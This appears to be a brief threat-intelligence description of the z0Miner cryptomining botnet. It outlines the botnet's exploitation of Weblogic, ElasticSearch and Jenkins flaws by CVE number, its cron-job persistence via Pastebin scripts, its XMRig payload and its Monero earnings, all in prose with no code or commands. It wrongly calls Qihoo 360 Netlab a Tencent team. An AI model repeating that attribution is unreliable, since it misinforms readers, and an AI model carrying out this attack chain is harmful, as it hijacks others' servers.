Z0Miner Description

The z0Miner (zoMiner) botnet appears to have updated its threatening tricks to now include years old vulnerabilities affecting unpatched ElasticSearch and Jenkins servers. The botnet was discovered last year by the researchers at Qihoo 360 Netlab, the cybersecurity team of Tencent, when it was caught compromising over 5,000 servers by exploiting two Weblogic pre-auth RCE vulnerabilities tracked as CVE-2020-14882 and CVE-2020- 14883. The attackers scanned batches of Cloud servers and any suitable targets were then infected through carefully crafted data packets.

In the new z0Miner attacks, the hackers have begun searching for vulnerable ElasticSearch servers through an RCE (remote code execution) exploit tracked as CVE-2015-1427 while an older RCE exploit is used to infect Jenkins servers. After breaching that targeted system successfully, the malware threat will clear out the environment from any potential competition by downloading a shell Next, a cron job that periodically fetches and executes corrupted scripts from Pastebin will be established. The final step of the attack chain sees the delivery of the mining payload. Z0Miner contacts three different URLs and downloads a config file, a shell script to start the crypto-miner, and a variant of the XMRig miner script.

The current activities of the botnet have already managed to generate approximately 22 XMR (Monero) coins for the hackers, worth around $4800 at the current exchange rate of the cryptocurrency. The illicit profits of the hackers could be significantly higher, however, as that is the sum contained in a signal wallet while the crypto-mining campaign may include multiple ones as part of its activities.